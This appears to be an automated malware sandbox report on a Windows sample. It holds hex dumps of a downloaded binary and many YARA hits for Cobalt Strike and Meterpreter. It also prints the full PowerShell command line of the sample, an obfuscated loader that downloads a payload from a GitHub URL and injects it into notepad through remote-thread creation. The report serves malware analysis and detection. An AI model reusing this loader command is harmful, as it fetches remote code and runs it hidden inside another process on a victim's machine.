8b d6 e8 11 40 00
                                                                        Data Ascii: _HL$HHL$pHt$@H|$8D$0HD$hHD$(DH|$ u&HnO5D$(MMLd$ OH?L$I[0Ik8Is@IA_A^A]A\_H\$Hl$Ht$WATAUAVAWHPHM=AHAH?AHH>HL$8DHL>HL$8EH@
                                                                        2023-01-21 00:14:27 UTC86INData Raw: 8b da 48 8b d1 48 8d 4c 24 20 e8 22 ff ff ff 0f 10 00 f3 0f 7f 44 24 20 8b 44 24 28 48 85 db 74 02 89 03 f7 d8 48 1b c0 48 23 44 24 20 48 83 c4 30 5b c3 cc cc 40 53 48 83 ec 20 48 63 41 10 48 8b d9 48 83 f8 02 73 04 33 c0 eb 19 48 8b 41 08 0f b7 08 ff 15 94 9c 01 00 48 83 43 08 02 83 43 10 fe 0f b7 c0 48 83 c4 20 5b c3 cc cc 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 56 48 83 ec 20 45 8b f0 48 8b ea 48 8b f1 e8 09 ff ff ff 48 63 d8 85 c0 74 2d 8d 7b 01 41 3b fe 7d 25 8b d3 48 8b ce e8 24 ff ff ff 48 85 c0 74 16 4c 8b c3 48 8b d0 48 8b cd e8 55 6f 00 00 c6 04 2b 00 8b c7 eb 02 33 c0 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 8b 7c 24 48 48 83 c4 20 41 5e c3 40 53 48 83 ec 20 48 8b d9 e8 aa fe ff ff 85 c0 75 08 33 c0 48 83 c4 20 5b c3
                                                                        Data Ascii: HHL$ "D$ D$(HtHH#D$ H0[@SH HcAHHs3HAHCCH [HHXHhHpHx AVH EHHHct-{A;}%H$HtLHHUo+3H\$0Hl$8Ht$@H|$HH A^@SH Hu3H [
                                                                        2023-01-21 00:14:27 UTC102INData Raw: 38 00 0f 84 73 01 00 00 48 83 7c 24 30 00 0f 84 d3 00 00 00 48 8b 44 24 30 48 b9 00 00 00 00 00 00 00 80 48 8b 00 48 23 c1 48 85 c0 0f 84 b5 00 00 00 48 8b 84 24 98 00 00 00 48 63 40 3c 48 8b 8c 24 98 00 00 00 48 03 c8 48 8b c1 48 89 44 24 40 b8 08 00 00 00 48 6b c0 00 48 8b 4c 24 40 48 8d 84 01 88 00 00 00 48 89 44 24 58 48 8b 44 24 58 8b 00 48 8b 8c 24 98 00 00 00 48 03 c8 48 8b c1 48 89 44 24 40 48 8b 44 24 40 8b 40 1c 48 8b 8c 24 98 00 00 00 48 03 c8 48 8b c1 48 89 44 24 48 48 8b 44 24 30 48 8b 00 48 25 ff ff 00 00 48 8b 4c 24 40 8b 49 10 48 2b c1 48 8b 4c 24 48 48 8d 04 81 48 89 44 24 48 48 8b 44 24 48 8b 00 48 8b 8c 24 98 00 00 00 48 03 c8 48 8b c1 48 8b 4c 24 28 48 89 01 eb 6b 48 8b 44 24 28 48 8b 00 48 8b 8c 24 88 00 00 00 48 03 c8 48 8b c1 48 89
                                                                        Data Ascii: 8sH|$0HD$0HHH#HH$Hc@<H$HHHD$@HkHL$@HHD$XHD$XH$HHHD$@HD$@@H$HHHD$HHD$0HH%HL$@IH+HL$HHHD$HHD$HH$HHHL$(HkHD$(HH$HHH
                                                                        2023-01-21 00:14:27 UTC118INData Raw: 42 50 eb 87 41 88 1a e8 59 11 00 00 bb 22 00 00 00 e9 6c ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 66 66 0f 1f 84 00 00 00 00 00 4c 8b d9 4d 0b c0 74 24 48 2b ca f6 c2 07 74 28 8a 02 84 c0 88 04 11 0f 84 e3 00 00 00 48 ff c2 49 ff c8 74 07 f6 c2 07 75 e6 eb 0c 49 8b c3 c3 48 89 04 11 48 83 c2 08 48 8b 02 49 83 e8 08 76 26 49 b9 ff fe fe fe fe fe fe 7e 4c 03 c8 4c 8b d0 49 83 f2 ff 4d 33 d1 49 b9 00 01 01 01 01 01 01 81 4d 85 d1 74 c9 49 83 c0 08 0f 84 8b 00 00 00 84 c0 88 04 11 0f 84 84 00 00 00 48 ff c2 49 ff c8 74 78 84 e4 88 24 11 74 75 48 ff c2 49 ff c8 74 69 48 c1 e8 10 84 c0 88 04 11 74 62 48 ff c2 49 ff c8 74 56 84 e4 88 24 11 74 53 48 ff c2 49 ff c8 74 47 48 c1 e8 10 84 c0 88 04 11 74 40 48 ff c2 49 ff c8 74 34 84 e4
                                                                        Data Ascii: BPAY"lffLMt$H+t(HItuIHHHIv&I~LLIM3IMtIHItx$tuHItiHtbHItV$tSHItGHt@HIt4
                                                                        2023-01-21 00:14:27 UTC134INData Raw: 03 e8 8b b8 ff ff cc 85 ff 74 08 33 c9 e8 6f f2 ff ff 90 41 bc 10 09 00 00 83 fb 0b 77 33 41 0f a3 dc 73 2d 48 8b 86 a8 00 00 00 48 89 44 24 28 48 83 a6 a8 00 00 00 00 83 fb 08 75 52 8b 86 b0 00 00 00 89 44 24 68 c7 86 b0 00 00 00 8c 00 00 00 83 fb 08 75 39 8b 0d 91 01 01 00 8b d1 89 4c 24 20 8b 05 89 01 01 00 03 c8 3b d1 7d 2c 48 63 ca 48 03 c9 48 8b 86 a0 00 00 00 48 83 64 c8 08 00 ff c2 89 54 24 20 8b 0d 60 01 01 00 eb d3 33 c9 ff 15 06 db 00 00 49 89 06 85 ff 74 07 33 c9 e8 c4 f3 ff ff 83 fb 08 75 0d 8b 96 b0 00 00 00 8b cb 41 ff d7 eb 05 8b cb 41 ff d7 83 fb 0b 0f 87 2c ff ff ff 41 0f a3 dc 0f 83 22 ff ff ff 48 8b 44 24 28 48 89 86 a8 00 00 00 83 fb 08 0f 85 0d ff ff ff 8b 44 24 68 89 86 b0 00 00 00 e9 fe fe ff ff 48 8b 5c 24 70 48 83 c4 30 41 5f 41
                                                                        Data Ascii: t3oAw3As-HHD$(HuRD$hu9L$ ;},HcHHHdT$ `3It3uAA,A"HD$(HD$hH\$pH0A_A
                                                                        2023-01-21 00:14:27 UTC150INData Raw: 4c 89 74 24 38 48 2b d8 4c 89 74 24 30 48 d1 fb 4c 8b c0 33 d2 44 8d 4b 01 33 c9 44 89 74 24 28 4c 89 74 24 20 ff 15 3a 9b 00 00 48 63 e8 85 c0 74 51 48 8b cd e8 63 bc ff ff 48 8b f0 48 85 c0 74 41 4c 89 74 24 38 4c 89 74 24 30 44 8d 4b 01 4c 8b c7 33 d2 33 c9 89 6c 24 28 48 89 44 24 20 ff 15 ff 9a 00 00 85 c0 75 0b 48 8b ce e8 cb 68 ff ff 49 8b f6 48 8b cf ff 15 87 9a 00 00 48 8b c6 eb 0b 48 8b cf ff 15 79 9a 00 00 33 c0 48 8b 5c 24 50 48 8b 6c 24 58 48 8b 74 24 60 48 8b 7c 24 68 48 83 c4 40 41 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 66 66 0f 1f 84 00 00 00 00 00 48 8b c1 48 f7 d9 48 a9 07 00 00 00 74 0f 66 90 8a 10 48 ff c0 84 d2 74 5f a8 07 75 f3 49 b8 ff fe fe fe fe fe fe 7e 49 bb 00 01 01 01 01 01 01 81 48 8b 10 4d 8b c8 48 83 c0
                                                                        Data Ascii: Lt$8H+Lt$0HL3DK3Dt$(Lt$ :HctQHcHHtALt$8Lt$0DKL33l$(HD$ uHhIHHHy3H\$PHl$XHt$`H|$hH@A^ffHHHtfHt_uI~IHMH
                                                                        2023-01-21 00:14:27 UTC166INData Raw: 24 30 4c 8b 44 24 30 41 8b 0c 08 8b 04 02 33 c1 b9 04 00 00 00 48 6b c9 09 48 8b 54 24 30 89 04 0a 8b 44 24 20 ff c0 89 44 24 20 83 7c 24 20 08 75 02 eb 7f b8 04 00 00 00 48 6b c0 04 b9 04 00 00 00 48 6b c9 09 48 8b 54 24 30 4c 8b 44 24 30 41 8b 0c 08 8b 04 02 33 c1 b9 04 00 00 00 48 6b c9 0a 48 8b 54 24 30 89 04 0a b8 04 00 00 00 48 6b c0 05 b9 04 00 00 00 48 6b c9 0a 48 8b 54 24 30 4c 8b 44 24 30 41 8b 0c 08 8b 04 02 33 c1 b9 04 00 00 00 48 6b c9 0b 48 8b 54 24 30 89 04 0a 48 8b 44 24 30 48 83 c0 18 48 89 44 24 30 e9 5d fe ff ff e9 58 04 00 00 83 7c 24 78 20 0f 85 43 04 00 00 c7 44 24 24 3c 00 00 00 b8 01 00 00 00 48 6b c0 00 48 8b 4c 24 70 0f b6 44 01 10 25 ff 00 00 00 c1 e0 18 b9 01 00 00 00 48 6b c9 01 48 8b 54 24 70 0f b6 4c 0a 10 81 e1 ff 00 00 00
                                                                        Data Ascii: $0LD$0A3HkHT$0D$ D$ |$ uHkHkHT$0LD$0A3HkHT$0HkHkHT$0LD$0A3HkHT$0HD$0HHD$0]X|$x CD$$<HkHL$pD%HkHT$pL
                                                                        2023-01-21 00:14:27 UTC182INData Raw: b8 03 00 00 00 e9 3e 02 00 00 48 8d 55 18 41 8b cf ff 15 56 1b 00 00 85 c0 74 9b 85 ff 7e 29 83 7d 18 02 72 db 38 5d 1e 48 8d 45 1e 74 d2 38 58 01 74 cd 41 8a 0c 24 3a 08 72 05 3a 48 01 76 a4 48 83 c0 02 38 18 eb e4 85 f6 7e 2c 83 7d 18 02 72 a1 38 5d 1e 48 8d 45 1e 74 98 38 58 01 74 93 41 8a 0e 3a 08 72 09 3a 48 01 0f 86 74 ff ff ff 48 83 c0 02 38 18 eb e1 44 8b cf 4d 8b c4 ba 09 00 00 00 41 8b cf 89 5c 24 28 48 89 5c 24 20 ff 15 80 17 00 00 4c 63 e8 85 c0 0f 84 16 ff ff ff 49 b8 f0 ff ff ff ff ff ff 0f 7e 68 33 d2 48 8d 42 e0 49 f7 f5 48 83 f8 02 72 59 4a 8d 0c 6d 10 00 00 00 48 81 f9 00 04 00 00 77 2f 48 8d 41 0f 48 3b c1 77 03 49 8b c0 48 83 e0 f0 e8 d4 00 ff ff 48 2b e0 4c 8d 74 24 30 4d 85 f6 0f 84 c4 fe ff ff 41 c7 06 cc cc 00 00 eb 13 e8 7d e8 fe
                                                                        Data Ascii: >HUAVt~)}r8]HEt8XtA$:r:HvH8~,}r8]HEt8XtA:r:HtH8DMA\$(H\$ LcI~h3HBIHrYJmHw/HAH;wIHH+Lt$0MA}
                                                                        2023-01-21 00:14:27 UTC198INData Raw: 00 2d 00 46 00 49 00 00 00 00 00 00 00 71 00 75 00 7a 00 2d 00 50 00 45 00 00 00 00 00 61 00 72 00 2d 00 4c 00 59 00 00 00 00 00 00 00 7a 00 68 00 2d 00 53 00 47 00 00 00 00 00 00 00 64 00 65 00 2d 00 4c 00 55 00 00 00 00 00 00 00 65 00 6e 00 2d 00 43 00 41 00 00 00 00 00 00 00 65 00 73 00 2d 00 47 00 54 00 00 00 00 00 00 00 66 00 72 00 2d 00 43 00 48 00 00 00 00 00 00 00 68 00 72 00 2d 00 42 00 41 00 00 00 00 00 00 00 73 00 6d 00 6a 00 2d 00 4e 00 4f 00 00 00 00 00 61 00 72 00 2d 00 44 00 5a 00 00 00 00 00 00 00 7a 00 68 00 2d 00 4d 00 4f 00 00 00 00 00 00 00 64 00 65 00 2d 00 4c 00 49 00 00 00 00 00 00 00 65 00 6e 00 2d 00 4e 00 5a 00 00 00 00 00 00 00 65 00 73 00 2d 00 43 00 52 00 00 00 00 00 00 00 66 00 72 00 2d 00 4c 00 55 00 00 00 00 00 00 00 62 00
                                                                        Data Ascii: -FIquz-PEar-LYzh-SGde-LUen-CAes-GTfr-CHhr-BAsmj-NOar-DZzh-MOde-LIen-NZes-CRfr-LUb
                                                                        2023-01-21 00:14:27 UTC214INData Raw: da a4 bf ad 3f e4 9d 3a 2c 0d 92 78 50 9b cc 5f 6a 62 46 7e 54 c2 13 8d f6 e8 b8 d8 90 5e f7 39 2e f5 af c3 82 be 80 5d 9f 7c 93 d0 69 a9 2d d5 6f b3 12 25 cf 3b 99 ac c8 a7 7d 18 10 6e 63 9c e8 7b bb 3b db 09 78 26 cd f4 18 59 6e 01 b7 9a ec a8 9a 4f 83 65 6e 95 e6 7e e6 ff aa 08 cf bc 21 e6 e8 15 ef d9 9b e7 ba ce 36 6f 4a d4 09 9f ea d6 7c b0 29 af b2 a4 31 31 23 3f 2a 30 94 a5 c6 c0 66 a2 35 37 bc 4e 74 a6 ca 82 fc b0 d0 90 e0 15 d8 a7 33 4a 98 04 f1 f7 da ec 41 0e 50 cd 7f 2f f6 91 17 8d d6 4d 76 4d b0 ef 43 54 4d aa cc df 04 96 e4 e3 b5 d1 9e 1b 88 6a 4c b8 1f 2c c1 7f 51 65 46 04 ea 5e 9d 5d 35 8c 01 73 74 87 fa 2e 41 0b fb 5a 1d 67 b3 52 d2 db 92 33 56 10 e9 13 47 d6 6d 8c 61 d7 9a 7a 0c a1 37 8e 14 f8 59 89 3c 13 eb ee 27 a9 ce 35 c9 61 b7 ed e5
                                                                        Data Ascii: ?:,xP_jbF~T^9.]|i-o%;}nc{;x&YnOen~!6oJ|)11#?*0f57Nt3JAP/MvMCTMjL,QeF^]5st.AZgR3VGmaz7Y<'5a
                                                                        2023-01-21 00:14:27 UTC230INData Raw: 61 6c 6c 2e 20 20 54 68 69 73 20 69 73 20 75 73 75 61 6c 6c 79 20 61 20 72 65 73 75 6c 74 20 6f 66 20 63 61 6c 6c 69 6e 67 20 61 20 66 75 6e 63 74 69 6f 6e 20 64 65 63 6c 61 72 65 64 20 77 69 74 68 20 6f 6e 65 20 63 61 6c 6c 69 6e 67 20 63 6f 6e 76 65 6e 74 69 6f 6e 20 77 69 74 68 20 61 20 66 75 6e 63 74 69 6f 6e 20 70 6f 69 6e 74 65 72 20 64 65 63 6c 61 72 65 64 20 77 69 74 68 20 61 20 64 69 66 66 65 72 65 6e 74 20 63 61 6c 6c 69 6e 67 20 63 6f 6e 76 65 6e 74 69 6f 6e 2e 0a 0d 00 00 00 00 41 20 63 61 73 74 20 74 6f 20 61 20 73 6d 61 6c 6c 65 72 20 64 61 74 61 20 74 79 70 65 20 68 61 73 20 63 61 75 73 65 64 20 61 20 6c 6f 73 73 20 6f 66 20 64 61 74 61 2e 20 20 49 66 20 74 68 69 73 20 77 61 73 20 69 6e 74 65 6e 74 69 6f 6e 61 6c 2c 20 79 6f 75 20 73 68 6f
                                                                        Data Ascii: all. This is usually a result of calling a function declared with one calling convention with a function pointer declared with a different calling convention.A cast to a smaller data type has caused a loss of data. If this was intentional, you sho
                                                                        2023-01-21 00:14:27 UTC246INData Raw: 04 52 74 6c 4c 6f 6f 6b 75 70 46 75 6e 63 74 69 6f 6e 45 6e 74 72 79 00 00 26 04 52 74 6c 56 69 72 74 75 61 6c 55 6e 77 69 6e 64 00 00 e2 04 55 6e 68 61 6e 64 6c 65 64 45 78 63 65 70 74 69 6f 6e 46 69 6c 74 65 72 00 00 b3 04 53 65 74 55 6e 68 61 6e 64 6c 65 64 45 78 63 65 70 74 69 6f 6e 46 69 6c 74 65 72 00 d3 04 54 6c 73 41 6c 6c 6f 63 00 00 d5 04 54 6c 73 47 65 74 56 61 6c 75 65 00 d6 04 54 6c 73 53 65 74 56 61 6c 75 65 00 d4 04 54 6c 73 46 72 65 65 00 6a 02 47 65 74 53 74 61 72 74 75 70 49 6e 66 6f 57 00 1e 02 47 65 74 4d 6f 64 75 6c 65 48 61 6e 64 6c 65 57 00 00 40 03 4c 6f 61 64 4c 69 62 72 61 72 79 45 78 57 00 00 25 04 52 74 6c 55 6e 77 69 6e 64 45 78 00 0c 03 49 73 56 61 6c 69 64 43 6f 64 65 50 61 67 65 00 78 01 47 65 74 43 50 49 6e 66 6f 00 20 05
                                                                        Data Ascii: RtlLookupFunctionEntry&RtlVirtualUnwindUnhandledExceptionFilterSetUnhandledExceptionFilterTlsAllocTlsGetValueTlsSetValueTlsFreejGetStartupInfoWGetModuleHandleW@LoadLibraryExW%RtlUnwindExIsValidCodePagexGetCPInfo
                                                                        2023-01-21 00:14:27 UTC262INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                        Data Ascii:


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:01:14:17
                                                                        Start date:21/01/2023
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" function /{([int[]][char[]]$args[0]|%{[char]($_-4)})-join''};$c =/ '_HppMqtsvx,&oivrip762hpp&-atyfpmg$wxexmg$i|xivr$MrxTxv$ZmvxyepEppsgI|,MrxTxv$e0$MrxTxv$f0$ymrx$g0$ymrx$h0$ymrx$i-? _HppMqtsvx,&oivrip762hpp&-atyfpmg$wxexmg$i|xivr$fssp$[vmxiTvsgiwwQiqsv},MrxTxv$e0$MrxTxv$f0$f}xi_a$g0$ymrx$h0$syx$mrx$i-? _HppMqtsvx,&oivrip762hpp&-atyfpmg$wxexmg$i|xivr$MrxTxv$GviexiViqsxiXlvieh,MrxTxv$e0$MrxTxv$f0$ymrx$g0$MrxTxv$h0$MrxTxv$i0$ymrx$j0$syx$MrxTxv$k-?';Add-Type -Name y -names x -m $c;$h = [System.Diagnostics.Process]::GetProcessById((ps notepad).id[0]).Handle;$a = [x.y]::(/ 'ZmvxyepEppsgI|')($h, 0, 0x100000, 0x1000, 0x40);$d = (iwr github.com/john-xor/temp/blob/main/index.html?raw=true).content;$n = 0;$t = 0;[x.y]::(/ '[vmxiTvsgiwwQiqsv}')($h, $a, $d, $d.Length, [ref] $n);[x.y]::(/ 'GviexiViqsxiXlvieh')($h, 0, 0, $a, 0, 0, [ref] $t);
                                                                        Imagebase:0x7ff7fbaf0000
                                                                        File size:447488 bytes
                                                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000000.00000002.357207100.000001A635DC6000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                        • Rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator, Description: Detects CobaltStrike C2 encoded profile configuration, Source: 00000000.00000002.357207100.000001A635DC6000.00000004.00000800.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                                        • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000002.357207100.000001A635DC6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.357207100.000001A635DC6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.357207100.000001A635DC6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: HKTL_Meterpreter_inMemory, Description: Detects Meterpreter in-memory, Source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, Author: netbiosX, Florian Roth
                                                                        • Rule: CobaltStrike_Sleeve_BeaconLoader_VA_x64_o_v4_3_v4_4_v4_5_and_v4_6, Description: Cobalt Strike\'s sleeve/BeaconLoader.VA.x64.o (VirtualAlloc) Versions 4.3 through at least 4.6, Source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, Author: gssincla@google.com
                                                                        • Rule: Malware_QA_vqgk, Description: VT Research QA uploaded malware - file vqgk.dll, Source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                        • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, Author: FireEye
                                                                        • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                        • Rule: CobaltStrike_Sleep_Decoder_Indicator, Description: Detects CobaltStrike sleep_mask decoder, Source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                                        • Rule: CobaltStrike_MZ_Launcher, Description: Detects CobaltStrike MZ header ReflectiveLoader launcher, Source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                                        • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                                        • Rule: HKTL_CobaltStrike_SleepMask_Jul22, Description: Detects static bytes in Cobalt Strike 4.5 sleep mask function that are not obfuscated, Source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, Author: CodeX
                                                                        • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                        • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: CobaltStrike_MZ_Launcher, Description: Detects CobaltStrike MZ header ReflectiveLoader launcher, Source: 00000000.00000002.323735392.000001A626DEF000.00000004.00000800.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                                        • Rule: HKTL_CobaltStrike_SleepMask_Jul22, Description: Detects static bytes in Cobalt Strike 4.5 sleep mask function that are not obfuscated, Source: 00000000.00000002.323735392.000001A626DEF000.00000004.00000800.00020000.00000000.sdmp, Author: CodeX
                                                                        • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000000.00000002.357207100.000001A635FDF000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                        • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.357207100.000001A635FDF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.357207100.000001A635FDF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000000.00000002.357207100.000001A635F4C000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                        • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.357207100.000001A635F4C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.357207100.000001A635F4C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator, Description: Detects CobaltStrike C2 encoded profile configuration, Source: 00000000.00000002.357207100.000001A635D78000.00000004.00000800.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                                        • Rule: CobaltStrike_MZ_Launcher, Description: Detects CobaltStrike MZ header ReflectiveLoader launcher, Source: 00000000.00000002.323735392.000001A626DA7000.00000004.00000800.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                                        • Rule: HKTL_CobaltStrike_SleepMask_Jul22, Description: Detects static bytes in Cobalt Strike 4.5 sleep mask function that are not obfuscated, Source: 00000000.00000002.323735392.000001A626DA7000.00000004.00000800.00020000.00000000.sdmp, Author: CodeX
                                                                        • Rule: CobaltStrike_Sleeve_BeaconLoader_VA_x64_o_v4_3_v4_4_v4_5_and_v4_6, Description: Cobalt Strike\'s sleeve/BeaconLoader.VA.x64.o (VirtualAlloc) Versions 4.3 through at least 4.6, Source: 00000000.00000002.357207100.000001A635EA9000.00000004.00000800.00020000.00000000.sdmp, Author: gssincla@google.com
                                                                        • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000002.357207100.000001A635EA9000.00000004.00000800.00020000.00000000.sdmp, Author: FireEye
                                                                        • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000000.00000002.357207100.000001A635EA9000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                        • Rule: CobaltStrike_MZ_Launcher, Description: Detects CobaltStrike MZ header ReflectiveLoader launcher, Source: 00000000.00000002.357207100.000001A635EA9000.00000004.00000800.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                                        • Rule: HKTL_CobaltStrike_SleepMask_Jul22, Description: Detects static bytes in Cobalt Strike 4.5 sleep mask function that are not obfuscated, Source: 00000000.00000002.357207100.000001A635EA9000.00000004.00000800.00020000.00000000.sdmp, Author: CodeX
                                                                        • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.357207100.000001A635EA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.357207100.000001A635EA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.357207100.000001A635EA9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.357207100.000001A635EA9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                        • Rule: HKTL_Meterpreter_inMemory, Description: Detects Meterpreter in-memory, Source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, Author: netbiosX, Florian Roth
                                                                        • Rule: CobaltStrike_Sleeve_BeaconLoader_VA_x64_o_v4_3_v4_4_v4_5_and_v4_6, Description: Cobalt Strike\'s sleeve/BeaconLoader.VA.x64.o (VirtualAlloc) Versions 4.3 through at least 4.6, Source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, Author: gssincla@google.com
                                                                        • Rule: Malware_QA_vqgk, Description: VT Research QA uploaded malware - file vqgk.dll, Source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                        • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, Author: FireEye
                                                                        • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                        • Rule: CobaltStrike_Sleep_Decoder_Indicator, Description: Detects CobaltStrike sleep_mask decoder, Source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                                        • Rule: CobaltStrike_MZ_Launcher, Description: Detects CobaltStrike MZ header ReflectiveLoader launcher, Source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, Author: yara@s3c.za.net
